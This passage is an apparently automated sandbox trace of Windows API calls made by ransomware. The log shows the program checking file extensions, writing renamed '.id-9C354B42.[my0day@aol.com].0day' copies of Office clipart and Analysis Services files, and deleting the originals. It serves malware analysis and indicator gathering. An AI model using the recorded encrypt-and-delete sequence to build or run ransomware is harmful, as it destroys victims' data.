(lpString=".pdf") returned 4 [0051.884] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString=".xls") returned 4 [0051.884] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString=".xlsx") returned 5 [0051.884] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0051.884] lstrlenW (lpString=".ppt") returned 4 [0051.884] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0051.884] lstrlenW (lpString=".zip") returned 4 [0051.884] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0051.884] lstrlenW (lpString=".rar") returned 4 [0051.884] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString=".bz2") returned 4 [0051.884] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString=".7z") returned 3 [0051.884] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0051.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0051.884] lstrlenW (lpString=".dbf") returned 4 [0051.884] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0051.884] lstrlenW (lpString=".1cd") returned 4 [0051.884] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0051.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0051.884] lstrlenW (lpString=".jpg") returned 4 [0051.884] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.885] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=32146) returned 1 [0051.885] CloseHandle (hObject=0x220) returned 1 [0051.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 0x20 [0051.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.886] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.886] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.886] GetLastError () returned 0x0 [0051.886] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x7d92, lpOverlapped=0x0) returned 1 [0051.888] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7da0, lpOverlapped=0x0) returned 1 [0051.889] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.889] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0051.890] SetEndOfFile (hFile=0x210) returned 1 [0051.890] CloseHandle (hObject=0x210) returned 1 [0051.890] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.890] SetEndOfFile (hFile=0x220) returned 1 [0051.891] CloseHandle (hObject=0x220) returned 1 [0051.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.891] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 1 [0051.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0051.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0051.891] lstrlenW (lpString=".doc") returned 4 [0051.891] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0051.891] lstrlenW (lpString=".docx") returned 5 [0051.891] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0051.891] lstrlenW (lpString=".pdf") returned 4 [0051.891] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0051.891] lstrlenW (lpString=".xls") returned 4 [0051.891] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0051.891] lstrlenW (lpString=".xlsx") returned 5 [0051.891] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0051.891] lstrlenW (lpString=".ppt") returned 4 [0051.891] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0051.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0051.891] lstrlenW (lpString=".zip") returned 4 [0051.892] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0051.892] lstrlenW (lpString=".rar") returned 4 [0051.892] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0051.892] lstrlenW (lpString=".bz2") returned 4 [0051.892] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0051.892] lstrlenW (lpString=".7z") returned 3 [0051.892] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0051.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0051.892] lstrlenW (lpString=".dbf") returned 4 [0051.892] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0051.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0051.892] lstrlenW (lpString=".1cd") returned 4 [0051.892] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0051.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0051.892] lstrlenW (lpString=".jpg") returned 4 [0051.892] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.892] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=39515) returned 1 [0051.892] CloseHandle (hObject=0x220) returned 1 [0051.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 0x20 [0051.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.892] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.893] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.893] GetLastError () returned 0x0 [0051.893] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x9a5b, lpOverlapped=0x0) returned 1 [0052.048] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x9a60, lpOverlapped=0x0) returned 1 [0052.049] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.049] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.049] SetEndOfFile (hFile=0x210) returned 1 [0052.049] CloseHandle (hObject=0x210) returned 1 [0052.050] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.050] SetEndOfFile (hFile=0x220) returned 1 [0052.051] CloseHandle (hObject=0x220) returned 1 [0052.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 1 [0052.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.146] lstrlenW (lpString=".doc") returned 4 [0052.146] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.146] lstrlenW (lpString=".docx") returned 5 [0052.146] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.146] lstrlenW (lpString=".pdf") returned 4 [0052.146] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.146] lstrlenW (lpString=".xls") returned 4 [0052.146] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.146] lstrlenW (lpString=".xlsx") returned 5 [0052.146] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.146] lstrlenW (lpString=".ppt") returned 4 [0052.146] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.146] lstrlenW (lpString=".zip") returned 4 [0052.146] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.147] lstrlenW (lpString=".rar") returned 4 [0052.147] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.147] lstrlenW (lpString=".bz2") returned 4 [0052.147] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.147] lstrlenW (lpString=".7z") returned 3 [0052.147] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.147] lstrlenW (lpString=".dbf") returned 4 [0052.147] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.147] lstrlenW (lpString=".1cd") returned 4 [0052.147] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.147] lstrlenW (lpString=".jpg") returned 4 [0052.147] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.386] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.393] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.393] GetLastError () returned 0x0 [0052.393] ReadFile (in: hFile=0x224, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x3a19, lpOverlapped=0x0) returned 1 [0052.415] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0052.416] ReadFile (in: hFile=0x224, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.416] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.416] SetEndOfFile (hFile=0x1d8) returned 1 [0052.416] CloseHandle (hObject=0x1d8) returned 1 [0052.416] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.417] SetEndOfFile (hFile=0x224) returned 1 [0052.417] CloseHandle (hObject=0x224) returned 1 [0052.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.418] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0052.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.427] lstrlenW (lpString=".doc") returned 4 [0052.427] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.427] lstrlenW (lpString=".docx") returned 5 [0052.427] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.427] lstrlenW (lpString=".pdf") returned 4 [0052.427] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.427] lstrlenW (lpString=".xls") returned 4 [0052.427] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.427] lstrlenW (lpString=".xlsx") returned 5 [0052.427] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.427] lstrlenW (lpString=".ppt") returned 4 [0052.427] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.428] lstrlenW (lpString=".zip") returned 4 [0052.428] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.428] lstrlenW (lpString=".rar") returned 4 [0052.428] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.428] lstrlenW (lpString=".bz2") returned 4 [0052.428] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.428] lstrlenW (lpString=".7z") returned 3 [0052.428] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.428] lstrlenW (lpString=".dbf") returned 4 [0052.428] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.428] lstrlenW (lpString=".1cd") returned 4 [0052.428] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.428] lstrlenW (lpString=".jpg") returned 4 [0052.428] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0054.063] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=13254) returned 1 [0054.063] CloseHandle (hObject=0x230) returned 1 [0054.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 0x20 [0054.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.064] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.064] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.064] GetLastError () returned 0x0 [0054.064] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x33c6, lpOverlapped=0x0) returned 1 [0054.066] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x33d0, lpOverlapped=0x0) returned 1 [0054.067] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.067] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.067] SetEndOfFile (hFile=0x1d8) returned 1 [0054.067] CloseHandle (hObject=0x1d8) returned 1 [0054.067] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.067] SetEndOfFile (hFile=0x230) returned 1 [0054.068] CloseHandle (hObject=0x230) returned 1 [0054.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0054.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0054.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0054.069] lstrlenW (lpString=".doc") returned 4 [0054.069] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0054.069] lstrlenW (lpString=".docx") returned 5 [0054.069] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0054.069] lstrlenW (lpString=".pdf") returned 4 [0054.069] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0054.069] lstrlenW (lpString=".xls") returned 4 [0054.069] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0054.069] lstrlenW (lpString=".xlsx") returned 5 [0054.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0054.069] lstrlenW (lpString=".ppt") returned 4 [0054.069] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0054.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0054.069] lstrlenW (lpString=".zip") returned 4 [0054.069] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0054.069] lstrlenW (lpString=".rar") returned 4 [0054.069] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0054.069] lstrlenW (lpString=".bz2") returned 4 [0054.069] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0054.069] lstrlenW (lpString=".7z") returned 3 [0054.069] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0054.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0054.069] lstrlenW (lpString=".dbf") returned 4 [0054.069] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0054.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0054.069] lstrlenW (lpString=".1cd") returned 4 [0054.069] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0054.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0054.069] lstrlenW (lpString=".jpg") returned 4 [0054.069] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0054.071] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.071] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.071] GetLastError () returned 0x0 [0054.071] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xd10, lpOverlapped=0x0) returned 1 [0054.073] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0054.073] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.074] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.074] SetEndOfFile (hFile=0x1d8) returned 1 [0054.074] CloseHandle (hObject=0x1d8) returned 1 [0054.074] 